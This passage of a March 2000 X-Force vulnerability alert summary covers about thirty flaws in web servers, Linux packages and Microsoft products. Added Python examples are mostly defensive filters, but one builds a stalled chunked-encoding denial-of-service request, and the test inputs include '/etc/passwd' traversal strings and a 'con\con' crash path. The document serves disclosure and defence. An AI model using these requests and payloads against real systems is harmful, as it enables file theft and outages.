      Reference:
      Bugtraq Mailing List: "Windmail allow web user get any file" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com
      
      _____
      
      Date Reported:          3/25/00
      Vulnerability:          windmail-fileread
      Platforms Affected:     WindMail 3.0
      Risk Factor:            Medium
      Attack Type:            Network Based
      
      WindMail is a command-line email messenger for Windows that can create
      mail forms for web sites from CGI scripts. By sending a
      specially-formatted URL, an attacker could retrieve any ASCII file on the
      vulnerable system.
      
      Reference:
      Bugtraq Mailing List: "Windmail allow web user get any file" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com
      
      _____
      
      Date Reported:          3/25/00
      Vulnerability:          simpleserver-exception-dos
      Platforms Affected:     SimpleServer WWW 1.03
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      AnalogX SimpleServer WWW is a standard web server for Windows. Version
      1.03 is vulnerable to a simple denial of service attack. By requesting a
      URL with exactly 8 characters following the /cgi-bin/ directory, an
      attacker can crash the server, requiring it to be rebooted.
      
      Reference:
      Bugtraq Mailing List: "AnalogX SimpleServer 1.03 Remote Crash" at: 
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=web-5645555@post2.rnci.com
      
      _____
      
      Date Reported:          3/23/00
      Vulnerability:          linux-domain-socket-dos
      Platforms Affected:     RedHat Linux (6.1, 6.2)
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      The Linux kernel is vulnerable to a denial of service attack due to
      improper handling of Unix domain sockets. The Unix domain sockets ignore
      limits set in wmem_max. A local attacker can crash the system by creating
      successive Unix domain sockets, requiring the system to be rebooted.
      
      Reference:
      Bugtraq Mailing List: "Local Denial-of-Service attack against Linux" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000323175509.A23709@clearway.com
      
      _____
      
      Date Reported:          3/22/00
      Vulnerability:          linux-gpm-root
      Platforms Affected:     Linux running Global Purpose Mouse
      Risk Factor:            Low
      Attack Type:            Host Based
      
      The General Purpose Mouse (gpm) package is a tool to enable the mouse for
      cutting and pasting on consoles, which ships with several Linux
      distributions. Due to a design flaw in gpm-root, which causes the setgid
      call to fail, a local user with console access can obtain the group id
      that is running gpm-root (usually root).
      
      Reference:
      Bugtraq Mailing List: "gpm-root" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000322182143.4498.qmail@securityfocus.com
      
      _____
      
      Date Reported:          3/22/00
      Vulnerability:          outlook-manipulate-hidden-drives
      Platforms Affected:     Microsoft Outlook 98
      Risk Factor:            Medium
      Attack Type:            Host Based
      
      Microsoft Outlook contains a vulnerability that would allow a local user
      to view hidden drives. In Windows NT, an administrator can hide specific
      drives using systems policies, so that they cannot be accessed using My
      Computer, Windows NT Explorer, or the command prompt. However, the Insert
      File option in Microsoft Outlook reveals the hidden drives, allowing a
      user to copy, cut, paste, or delete files.
      
      Reference:
      Bugtraq Mailing List: "Hide Drives does not work with OUTLOOK 98" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000322151011.2581.qmail@securityfocus.com
      
      _____
      
      Date Reported:          3/21/00
      Vulnerability:          vqserver-dir-traverse
      Platforms Affected:     vqSoft's vqServer
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      vqServer by vqSoft is a Java-based personal web server for
      cross-platform environments. Version 1.9.9 of vqServer, and possibly
      others, contains a vulnerability that allows a user to traverse
      directories by inserting the sequence /........../ into a requested URL.
      A remote attacker can use this to read any file on the system that the
      server itself can read.
      
      Reference:
      Bugtraq Mailing List: "vqserver /........../" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net
      
      _____
      
      Date Reported:          3/21/00
      Vulnerability:          vqserver-passwd-plaintext
      Platforms Affected:     vqSoft's vqServer
      Risk Factor:            High
      Attack Type:            Network/Host Based
      
      vqServer by vqSoft is a Java-based personal web server for
      cross-platform environments. Version 1.9.9 of vqServer, and possibly
      others, stores its server settings and passwords in cleartext. A remote
      user could retrieve the password file through the directory traversal
      vulnerability described above, obtain the administrator password, and
      gain administrative rights to the server.
      
      Reference:
      Bugtraq Mailing List: "vqserver /........../" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net
      
      _____
      
      Date Reported:          3/20/00
      Vulnerability:          iis-chunked-encoding-dos
      Platforms Affected:     Microsoft Internet Information Server 4.0
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      Microsoft Internet Information Server (IIS) 4.0 contains a vulnerability
      in its support for chunked-encoding transfers: it does not limit the
      size of these transfers. An attacker can declare an extremely large
      chunk so that the server reserves a buffer for it, and then keep the
      session open without ever sending the data. Enough such requests consume
      sufficient memory for the server to stop functioning properly. Service
      is restored by stopping and restarting IIS.
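
      The request described above and the bound that was missing, as an added
      example (not IIS code and not part of the bulletin): build_stalled_post()
      produces the client side of the attack, and parse_chunked_body() reads
      the same wire format but checks each declared chunk size against a
      per-request cap before reading or reserving anything. The host name, the
      cap and the request bytes are constructed for the example.

```python
"""Chunked transfer encoding: the stalled-POST attack and a bounded decoder.

Added example; not IIS code or anything from the bulletin. MAX_BODY is an
assumption of the example; a real server would make it configurable.
"""
from typing import Optional, Tuple

MAX_BODY = 1 << 20      # per-request body cap (1 MiB)


def build_stalled_post(host: str, declared_chunk_size: int) -> bytes:
    """Attack request: declare one enormous chunk and send no data for it.
    An attacker keeps the connection open after this instead of completing
    the chunk."""
    return (
        "POST /upload HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "\r\n"
        f"{declared_chunk_size:x}\r\n"
    ).encode("ascii")


def split_request(raw: bytes) -> Tuple[bytes, bytes]:
    """Separate the header block from the (possibly partial) body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head, body


def parse_chunked_body(data: bytes, max_body: int = MAX_BODY) -> Optional[bytes]:
    """Decode a chunked body with a hard size cap.

    Returns the payload once the terminating zero-length chunk is seen, or
    None if more bytes are needed (what a non-blocking server sees while the
    client stalls). Raises ValueError as soon as a declared chunk would exceed
    the cap, before any data for it is read or buffered."""
    out = bytearray()
    pos = 0
    while True:
        eol = data.find(b"\r\n", pos)
        if eol < 0:
            return None                                  # size line incomplete
        size_field = data[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        try:
            size = int(size_field.decode("ascii"), 16)
        except ValueError:
            raise ValueError("malformed chunk size line")
        if size < 0:
            raise ValueError("negative chunk size")
        if size > max_body - len(out):
            # The bound the vulnerable server lacked: decide on the declared
            # number, not on what has actually arrived.
            raise ValueError(f"declared chunk of {size} bytes exceeds cap of {max_body}")
        pos = eol + 2
        if size == 0:
            return bytes(out)                            # last chunk; trailers ignored
        if len(data) < pos + size + 2:
            return None                                  # chunk data not all here yet
        out += data[pos:pos + size]
        pos += size + 2                                  # skip data and its CRLF


if __name__ == "__main__":
    print(parse_chunked_body(b"5\r\nhello\r\n6\r\n world\r\n0\r\n\r\n"))
    _, body = split_request(build_stalled_post("victim.example", 1 << 30))
    try:
        parse_chunked_body(body)
    except ValueError as e:
        print("rejected:", e)
```

      The cap removes the memory reservation; a client that declares a small
      chunk and still sends nothing continues to hold the connection, so the
      decoder needs an idle timeout and a per-client connection limit beside it.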
      
      Reference:
      Microsoft Security Bulletin (MS00-018): "Patch Available for 'Chunked
      Encoding Post' Vulnerability" at:
      http://www.microsoft.com/technet/security/bulletin/ms00-018.asp
      
      _____
      
      Date Reported:          3/17/00
      Vulnerability:          nav-email-gateway-dos
      Platforms Affected:     Norton AntiVirus for Internet Email Gateways
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      Norton AntiVirus for Internet Email Gateways is an SMTP agent that scans
      email attachments for viruses. It includes a web-based management and
      administration interface served by a web server embedded in the
      product. A user who sends an overly long URL to that server overflows a
      buffer and crashes the program.
      
      Reference:
      Bugtraq Mailing List: "DoS with NAVIEG" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=s8d1f3e3.036@kib.co.kodiak.ak.us
      
      _____
      
      Date Reported:          3/17/00
      Vulnerability:          netscape-server-directory-indexing
      Platforms Affected:     Netscape Enterprise Server (3.0, 3.51, 3.6)
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      Netscape Enterprise Server version 3.x contains a feature called Directory
      Indexing. This feature, which is enabled by default, displays a directory
      listing when a user includes certain tags in a requested URL. This
      could allow a remote attacker to gain unauthorized access to documents or
      retrieve lists of file names (such as CGI scripts).
      
      Reference:
      Bugtraq Mailing List: "[SAFER 000317.EXP.1.5] Netscape Enterprise Server
      and '?wp' tags" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com
      
      _____
      
      Date Reported:          3/16/00
      Vulnerability:          mercur-webview-get-dos 
      Platforms Affected:     Mercur WebView WebMail-Client 1.0
      Risk Factor:            Medium
      Attack Type:            Network/Host Based
      
      MERCUR WebView WebMail-Client 1.0 is an add-on to the MERCUR 3.0 mail
      server that allows users to read email via a web browser. Due to improper
      bounds checking in its handling of GET requests on port 1080, a user can
      overflow a buffer and crash the WebMail service.
      
      Reference:
      Underground Security Systems Research: "Local / Remote DoS Attack in
      MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability" at:
      http://www.ussrback.com/labs36.html
      
      _____
      
      Date Reported:          3/16/00
      Vulnerability:          officescan-admin-pw-plaintext
      Platforms Affected:     Trend Micro OfficeScan Corporate Edition 
                              (3.0, 3.11, 3.13, 3.5)
      Risk Factor:            High
      Attack Type:            Network/Host Based
      
      Trend Micro OfficeScan 3.51 and below transmits the administrator password
      over the network in cleartext. OfficeScan is anti-virus software for
      corporate networks. When configured in the web-based mode on a Windows NT
      server, an attacker can use a sniffing program to intercept the
      administrator password.
      
      Reference:
      Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com
      
      _____
      
      Date Reported:          3/16/00
      Vulnerability:          officescan-admin-access
      Platforms Affected:     Trend Micro OfficeScan Corporate Edition 
                              (3.0, 3.11, 3.13, 3.5)
      Risk Factor:            High
      Attack Type:            Network/Host Based
      
      Trend Micro OfficeScan 3.51 and below allows users to perform
      administrative tasks without authentication. OfficeScan is anti-virus
      software for corporate networks. When configured in the web-based mode on
      a Windows NT server, an unauthenticated attacker can use a web browser to
      access and execute cgi scripts for administration of the software across
      the network.
      
      References:
      Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com
      
      Bugtraq Mailing List: "Trend Micro releases Patch for 'OfficeScan
      Unauthenticated CGI Usage' vulnerability" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=D129BBE1730AD2118A0300805FC1C2FE0650E8E6@209-76-212-10.trendmicro.com
      
      _____
      
      Date Reported:          3/16/00
      Vulnerability:          linux-kreatecd-path
      Platforms Affected:     SUSE Linux (6.0, 6.1, 6.2, 6.3)
      Risk Factor:            High
      Attack Type:            Host Based
      
      The kreatecd package is a graphical front end for the cdrecord command
      that ships with several Linux distributions. The program is installed
      setuid root and trusts the path to cdrecord given in its configuration,
      so a local attacker can use kreatecd to execute commands as root.
      
      Reference:
      Bugtraq Mailing List: "TESO & C-Skills development advisory -- kreatecd" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=ine.LNX.3.96.1000316143853.257E-200000@ati12.cs.uni-potsdam.de
      
      _____
      
      Date Reported:          3/16/00
      Vulnerability:          win-dos-devicename-dos
      Platforms Affected:     Windows 95
                              Windows 98
      Risk Factor:            Medium
      Attack Type:            Network Based
      
      Microsoft Windows 95 and 98 contain a vulnerability in the parsing of file
      path names. DOS device names, such as COM1 or LPT1, are reserved words and
      normally cannot be used as file or directory names. If a user attempts to
      access a path name that includes a single DOS device name, it is treated
      as invalid and an error is returned. However, if the path name includes
      multiple DOS device names, the machine crashes.
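
      A filter that follows from this entry, as an added example (not
      Microsoft's code and not part of the bulletin): anything on a Windows
      95/98 machine that accepts file names from untrusted input (a web
      server's document path, a share request, an upload name) should refuse
      paths with a device name in any component, since one already yields an
      error and several crash the machine. The reserved-name list is the
      standard DOS set; the sample paths are constructed for the example.

```python
"""Reject paths that name DOS devices before handing them to the file system.

Added example; not Microsoft's code. Matching is per path component and
case-insensitive, an extension does not help ("nul.txt" still refers to the
NUL device), and trailing dots and spaces are stripped first because Windows
ignores them as well.
"""
import re
from typing import List

_DEVICE = re.compile(r"^(CON|PRN|AUX|NUL|CLOCK\$|COM[1-9]|LPT[1-9])(\..*)?$",
                     re.IGNORECASE)


def dos_device_names_in(path: str) -> List[str]:
    """Return each path component that names a DOS device, in order."""
    components = [c for c in re.split(r"[\\/]+", path) if c]
    return [c for c in components if _DEVICE.match(c.rstrip(" ."))]


def is_safe_windows_path(path: str) -> bool:
    """Conservative filter: one device name is an error on Windows and several
    crash Windows 95/98, so reject the path if any appear at all."""
    return not dos_device_names_in(path)


if __name__ == "__main__":
    for sample in (r"C:\inetpub\wwwroot\index.htm", r"C:\con\con",
                   "/images/COM1/logo.gif", r"\\fileserver\share\nul.txt"):
        print(f"{sample:32} -> {dos_device_names_in(sample) or 'clean'}")
```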
      
      Reference:
      Microsoft Security Bulletin (MS00-017): "Patch Available for 'DOS Device
      in Path Name' Vulnerability" at:
      http://www.microsoft.com/technet/security/bulletin/ms00-017.asp
      
      _____
      
      Date Reported:          3/10/00
      Vulnerability:          wmcdplay-bo
      Platforms Affected:     wmcdplay
      Risk Factor:            High
      Attack Type:            Host Based
      
      The wmcdplay CD player program is vulnerable to a buffer overflow. A
      local attacker can pass an overly long argument that overflows the stack,
      due to insufficient bounds checking on calls to sprintf. Because the
      program is setuid root, an attacker who overflows the stack can execute
      arbitrary code and gain root privileges on the system.
      
      Reference:
      BugTraq mailing list: "wmcdplay Buffer Overflow Vulnerability" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000311143230.4C0C01EE8B@lists.securityfocus.com
      
      _____
      
      Date Reported:          3/9/00
      Vulnerability:          nt-registry-permissions
      Platforms Affected:     Microsoft Windows NT 4.0
      Risk Factor:            High
      Attack Type:            Host Based
      
      Windows NT 4.0, including the Workstation, Server, and Terminal Server
      versions, ships with some registry keys whose permissions are too
      permissive. A local user with access to the machine could use them to
      increase their access and cause code to be executed on the machine.
      
      Reference:
      Microsoft Security Bulletin (MS00-008): "Patch Available for 'Registry
      Permissions' Vulnerability" at:
      http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
      
      _____
      
      Date Reported:          3/9/00
      Vulnerability:          staroffice-scheduler-fileread
      Platforms Affected:     StarOffice 5.1
      Risk Factor:            Medium
      Attack Type:            Network Based
      
      StarOffice is an office-productivity suite from Sun Microsystems. The
      StarSchedule server, which provides the group scheduling component of
      StarOffice, allows an attacker to read files on the server: a remote
      user can traverse directories using "../" sequences in a URL and read
      any file on the server through a browser.
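
      The check that both this entry and the vqServer entry above lack, as an
      added example (not code from StarOffice or vqServer): a server must apply
      it to the exact path it is about to open, percent-decoding once,
      normalising lexically, and then requiring the result to stay inside the
      document root. The document root and the sample request targets are
      constructed for the example.

```python
"""Map a request path onto a document root and refuse anything that escapes it.

Added example; not code from vqServer or StarOffice. Works on the lexical
path only; see the note after the block about symbolic links.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote


def resolve_under_docroot(docroot: str, request_target: str) -> Optional[str]:
    """Return the absolute file path a request maps to, or None if it must be
    refused (escapes the root, or contains a NUL byte)."""
    docroot = posixpath.normpath(docroot)
    # Strip query string and fragment, then decode exactly once. Decoding
    # before the check is what defeats %2e%2e%2f spellings of "../".
    path = request_target.split("?", 1)[0].split("#", 1)[0]
    path = unquote(path)
    if "\x00" in path:
        return None                       # a C server would truncate here
    # Lexical join + normalisation collapses every "." and ".." component.
    candidate = posixpath.normpath(posixpath.join(docroot, path.lstrip("/")))
    # Either the root itself or strictly below it; the trailing "/" stops
    # "/srv/www" from matching "/srv/www-private".
    if candidate != docroot and not candidate.startswith(docroot + "/"):
        return None
    return candidate


if __name__ == "__main__":
    root = "/srv/www"
    for target in ("/index.html", "/docs/../index.html?x=1", "/../../etc/passwd",
                   "/%2e%2e/%2e%2e/etc/passwd", "/........../etc/passwd"):
        print(f"{target:32} -> {resolve_under_docroot(root, target)}")
```

      Note that "/........../etc/passwd" stays under the root here, because a
      run of dots is an ordinary directory name to normpath; the vqServer
      report says its own path handling turned that sequence into a traversal,
      which is the general lesson: the check is only as good as its agreement
      with the path the open() call actually receives. Symbolic links inside
      the root are a separate problem; resolve the final path with realpath()
      at open time if the tree can contain links created by others.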
      
      Reference:
      Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice)
      vulnerabilities" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com
      
      _____
      
      Date Reported:          3/9/00
      Vulnerability:          staroffice-scheduler-bo
      Platforms Affected:     StarOffice 5.1
      Risk Factor:            High
      Attack Type:            Network Based
      
      StarOffice is an office-productivity suite from Sun Microsystems. The
      StarSchedule server, which provides the group scheduling component of
      StarOffice, is vulnerable to a buffer overflow. Sending a large amount
      of data in a GET request crashes the server and could allow an attacker
      to execute arbitrary code as root.
      
      Reference:
      Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice)  
      vulnerabilities" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com
      
      _____
      
      Date Reported:          3/8/00
      Vulnerability:          iis-root-enum
      Platforms Affected:     IIS (4.0, 5.0)
      Risk Factor:            Medium
      Attack Type:            Host Based
      
      Microsoft Internet Information Server (IIS) 4.0 and 5.0 discloses the
      UNC paths of network shares if configured incorrectly. Files of type IDQ,
      IDA, and HTX cannot be served from a network share. If a web site
      administrator nevertheless tries to serve these types of files from a
      network share, a user who requests one of them receives an error message
      that discloses the share path of the file.
      
      Reference:
      BugTraq mailing list: "Microsoft IIS UNC Path Disclosure Vulnerability" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=007201bf89dc$a18dd2e0$056fee3f@spis.net
      
      _____
      
      Date Reported:          3/8/00
      Vulnerability:          mssql-query-abuse
      Platforms Affected:     Microsoft SQL Server 7.0
                              Microsoft Data Engine 1.0
      Risk Factor:            High
      Attack Type:            Network Based
      
      Microsoft SQL Server 7.0 and Microsoft Data Engine 1.0 are vulnerable to a
      remote query problem. The server and engine do not perform sufficient
      argument validation on particular types of SQL statements. A remote user
      who has access to submit queries could take actions on the SQL database
      and possibly perform actions on the server itself.
      
      Reference:
      Microsoft Security Bulletin (MS00-014): "Patch Available for 'SQL Query
      Abuse' Vulnerability" at:
      http://www.microsoft.com/technet/security/bulletin/ms00-014.asp
      
      _____
      
      Date Reported:          3/6/00
      Vulnerability:          clipart-cil-bo
      Platforms Affected:     Microsoft Office 2000
                              Microsoft Works 2000
      Risk Factor:            High
      Attack Type:            Host Based
      
      Microsoft Clip Art Gallery, shipped with such packages as Microsoft Office
      2000 and Microsoft Works 2000, contains a possible buffer overflow in the
      handling of CIL files. The CIL file format is used for downloading
      additional clips for installation into the gallery. If a CIL file is
      created with a long field embedded in it, it will overflow the buffer and
      crash the Clip Gallery, which could result in the execution of arbitrary
      code.
      
      Reference:
      Microsoft Security Bulletin (MS00-015): "Patch Available for 'Clip Art
      Buffer Overrun' Vulnerability" at:
      http://www.microsoft.com/technet/security/bulletin/ms00-015.asp
      
      _____
      
      Date Reported:          3/5/00
      Vulnerability:          oracle-installer
      Platforms Affected:     Oracle 8.1.5i
      Risk Factor:            High
      Attack Type:            Host Based
      
      The installation program for Oracle 8.1.5i contains a vulnerability that
      could allow an attacker to gain root access. The Oracle installation
      script creates the directory /tmp/orainstall, owned by oracle:dba, mode
      711, containing the shell script orainstRoot.sh, mode 777. The
      installation program then stops and asks the user to run orainstRoot.sh
      as root. A local attacker could turn this file into a symbolic link
      pointing elsewhere on the file system, for example to create an .rhosts
      file and gain access to the root account, or simply edit the
      world-writable script so that it executes arbitrary commands when root
      runs it.
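
      The check the privileged side should make before executing a file,
      covering both this entry and the kreatecd entry above, as an added
      example (not Oracle's or kreatecd's code): root must not run a file
      whose contents, or whose location, another local user can change. The
      function uses only stat(2) fields; the files it examines are created by
      the example itself in a temporary directory and are constructed to
      mirror the layouts the two entries describe.

```python
"""Ownership and mode checks before a privileged program executes a file.

Added example; not Oracle's installer or kreatecd's code. The demo_check()
helper recreates the two layouts (a mode-777 script, the same script with a
sane mode, and a 'cdrecord' that is really a symlink) in a fresh temporary
directory; those files are constructed for the example.
"""
import os
import stat
import tempfile
from typing import Dict, List, Optional, Sequence


def unsafe_to_run_as_root(path: str, trusted_uids: Sequence[int] = (0,)) -> List[str]:
    """Return the reasons `path` must not be executed with root privileges;
    an empty list means the file passed. Parent directories are checked too,
    because a writable, non-sticky parent lets an attacker rename the file
    away and drop a symlink in its place."""
    problems: List[str] = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return ["does not exist"]
    if stat.S_ISLNK(st.st_mode):
        problems.append("is a symbolic link")            # can be repointed at will
        try:
            st = os.stat(path)                            # examine the target as well
        except FileNotFoundError:
            return problems + ["dangling symbolic link"]
    if st.st_uid not in trusted_uids:
        problems.append(f"owned by uid {st.st_uid}, not a trusted uid")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append(f"writable by group/other (mode {stat.S_IMODE(st.st_mode):04o})")

    parent = os.path.dirname(os.path.abspath(path))
    while True:
        pst = os.stat(parent)
        if pst.st_uid not in trusted_uids:
            problems.append(f"parent {parent} owned by uid {pst.st_uid}, not a trusted uid")
        if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
            problems.append(f"parent {parent} is world-writable without the sticky bit")
        up = os.path.dirname(parent)
        if up == parent:                                  # reached "/"
            break
        parent = up
    return problems


def demo_check(trusted_uids: Optional[Sequence[int]] = None) -> Dict[str, List[str]]:
    """Build the sample layout and run the check on each entry."""
    if trusted_uids is None:
        trusted_uids = (0, os.getuid())                   # the example's own files count as trusted
    d = tempfile.mkdtemp(prefix="orainstall-")
    layout = {
        "script": (os.path.join(d, "orainstRoot.sh"), 0o777),        # as in the advisory
        "fixed": (os.path.join(d, "orainstRoot-fixed.sh"), 0o755),   # same script, sane mode
    }
    for p, mode in layout.values():
        with open(p, "w") as f:
            f.write("#!/bin/sh\necho running as root\n")
        os.chmod(p, mode)
    link = os.path.join(d, "cdrecord")                    # kreatecd-style: attacker-chosen path
    os.symlink("/bin/sh", link)
    targets = {name: p for name, (p, _) in layout.items()}
    targets["link"] = link
    return {name: unsafe_to_run_as_root(p, trusted_uids) for name, p in targets.items()}


if __name__ == "__main__":
    for name, problems in demo_check().items():
        print(f"{name}: {'OK' if not problems else '; '.join(problems)}")
```

      The check is advisory, not a lock: between the stat and the exec the
      file can still change, so a privileged program should additionally open
      the file itself and execute what it opened (fexecve(), or reading the
      script through an already-open descriptor) rather than by name.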
      
      Reference:
      BugTraq Mailing List: "Oracle for Linux Installer Vulnerability" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.BSO.4.10.10003051801030.22289-100000@obscurity.org
      
      _____
      
      Date Reported:          3/3/00
      Vulnerability:          linux-rpm-query
      Platforms Affected:     Caldera OpenLinux 2.3
      Risk Factor:            Medium
      Attack Type:            Network Based
      
      Caldera OpenLinux 2.3 contains a vulnerability in the rpm_query CGI,
      which is installed in the /home/httpd/cgi-bin/ directory. A remote user
      can run this CGI to obtain the name and version number of every package
      installed on the system, which tells an attacker exactly which
      vulnerable versions are present.
      
      Reference:
      BugTraq mailing list: "Caldera OpenLinux 2.3 rpm_query CGI Vulnerability" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.21.0003041204220.6797-100000@juggernaut.el8.org
      
      _____
      
      Date Reported:          3/2/00
      Vulnerability:          thebat-mua-attach
      Platforms Affected:     The Bat!
      Risk Factor:            Medium
      Attack Type:            Network Based
      
      The Bat! is a mail agent for Windows developed by Rit Research Labs. One
      of the program's features is that it saves attachments from incoming mail
      in a specified folder on the system, and adds the file's path to the
      incoming message as a pseudo-header called X-BAT-FILES. If a message with
      an attachment is forwarded to someone else, the pseudo-header line
      remains. This allows the recipient to see the sender's default location
      for all saved email attachments.
      
      Reference:
      BugTraq Mailing List: "Rit Research Labs 'The Bat!' X-BAT-FILES
      Vulnerabilities" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=200003021443.RAA31070@adm.sci-nnov.ru
      
      _____
      
      Date Reported:          3/2/00
      Vulnerability:          irix-infosrch-fname
      Platforms Affected:     IRIX 6.5
      Risk Factor:            High
      Attack Type:            Network/Host Based
      
      InfoSearch is a tool distributed by SGI that converts man pages, release
      notes, and other documents into HTML format for reading on the Internet.
      It contains a vulnerability in the method it uses to parse input for the
      fname variable that would allow a remote attacker to execute arbitrary
      commands on the web server.
      
      Reference:
      Bugtraq Mailing List: "infosrch.cgi vulnerability (IRIX 6.5)" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.4.10.10003021059360.21162-100000@inetarena.com
      
      _____
      
      Date Reported:          3/2/00
      Vulnerability:          linux-dosemu-config
      Platforms Affected:     Corel Linux 1.0
      Risk Factor:            High
      Attack Type:            Host Based
      
      Corel Linux 1.0 contains a vulnerability in the configuration of the
      dosemu package. Dosemu is a DOS emulator that allows DOS programs to run
      on Linux. A local user can use the system.com binary to execute commands
      as root.
      
      Reference:
      Bugtraq Mailing List: "Corel Linux 1.0 dosemu default configuration: Local
      root vuln" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=200003020436.PAA20168@jawa.chilli.net.au
      
      _____
      
      Date Reported:          3/1/00
      Vulnerability:          coldfusion-reveal-pathname
      Platforms Affected:     ColdFusion 4.01
      Risk Factor:            Low
      Attack Type:            Network Based
      
      ColdFusion 4.01 contains a vulnerability that reveals the path names of
      .cfm pages. When a remote user makes an HTTP request to a .cfm page, the
      server can return an error message that reveals the full file system
      path of the file.
      
      Reference:
      NTBUGTRAQ Mailing List: "ColdFusions application.cfm shows full path" at:
      http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0003&L=ntbugtraq&F=&S=&P=435
      
      _____
      
      Date Reported:          3/1/00
      Vulnerability:          netscape-enterprise-command-bo
      Platforms Affected:     Netscape Enterprise Server (3.6)
      Risk Factor:            High
      Attack Type:            Network Based
      
      Netscape Enterprise Server 3.6 for Windows NT 4.0 contains a buffer
      overflow in its handling of commands issued to the server. If a remote
      user issues a command followed by a large quantity of data, the server
      crashes, and the user may then be able to execute arbitrary code.
      
      References:
      S.A.F.E.R. Security Bulletin SAFER 000229.EXP.1.3: "Buffer Overflow in
      Netscape Enterprise Server" at:
      http://www.safermag.com/advisories/0006.html
      
      BUGTRAQ Mailing List: "[SAFER 000229.EXP.1.3] Remote buffer overflow in
      Netscape Enterprise Server 3.6 SP2" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-29&msg=38BC065A.E6AE7002@relaygroup.com
      
      _____
      
      Date Reported:          3/1/00
      Vulnerability:          nmh-execute-code
      Platforms Affected:     Debian Linux 2.1
      Risk Factor:            High
      Attack Type:            Network Based
      
      The nmh package does not properly check incoming mail message headers. A
      remote attacker could send specially-crafted MIME message headers that
      would cause mhshow to execute arbitrary code.
      
      Reference:
      Debian Security Advisory: "New version of nmh released" at:
      http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00005.html
      
      _____
       
      Date Reported:          3/1/00
      Vulnerability:          htdig-remote-read
      Platforms Affected:     Unix running htdig 3.1.5
      Risk Factor:            Low
      Attack Type:            Network Based
      
      The ht://dig program is a web indexing and searching system for intranets
      and small domains. Due to improper validation of form input, a remote
      attacker could pass a variable to the htsearch CGI that would allow the
      attacker to read any file on the machine that is accessible by the htdig
      user.
      
      Reference:
      Debian Security Advisory: "New version of htdig released" at:
      http://www.debian.org/Lists-Archives/debian-security-announce-00/msg00004.html
      
      _____
      
      Date Reported:          3/1/00
      Vulnerability:          ie-html-shortcut
      Platforms Affected:     Microsoft Internet Explorer (5.0, 5.0.1)
      Risk Factor:            High
      Attack Type:            Network/Host Based
      
      Microsoft Internet Explorer 5 uses window.showHelp() to open HTML help
      files (.chm). If these files contain a shortcut to an executable, it will
      be run with the privileges of the current user. An attacker could create a
      .chm file with a link to an executable and cause it to execute on the
      victim's machine.
      
      Reference:
      Bugtraq Mailing List: "IE 5.x allows executing arbitrary programs using
      .chm files" at:
      http://www.securityfocus.com/templates/archive.pike?list=1&msg=38BD37F6.C9B3F8B@nat.bg
      
      _____
      
      Risk Factor Key:
      
              High    Any vulnerability that provides an attacker with immediate
                      access into a machine, gains superuser access, or bypasses
                      a firewall.  Example:  A vulnerable Sendmail 8.6.5 version
                      that allows an intruder to execute commands on mail
                      server.
              Medium  Any vulnerability that provides information that has a
                      high potential of giving system access to an intruder.
                      Example: A misconfigured TFTP or vulnerable NIS server
                      that allows an intruder to get the password file that
                      could contain an account with a guessable password.
              Low     Any vulnerability that provides information that
                      potentially could lead to a compromise.  Example:  A
                      finger that allows an intruder to find out who is online
                      and potential accounts to attempt to crack passwords
                      via brute force methods.
      
      _____
      
      Permission is hereby granted for the redistribution of this Alert Summary
      electronically.  It is  not to be edited in any way without express
      consent of the X-Force.  If you wish to reprint the whole or any part of
      this Alert Summary in any other medium excluding electronic medium,
      please e-mail xforce@iss.net for permission.
      
      Disclaimer
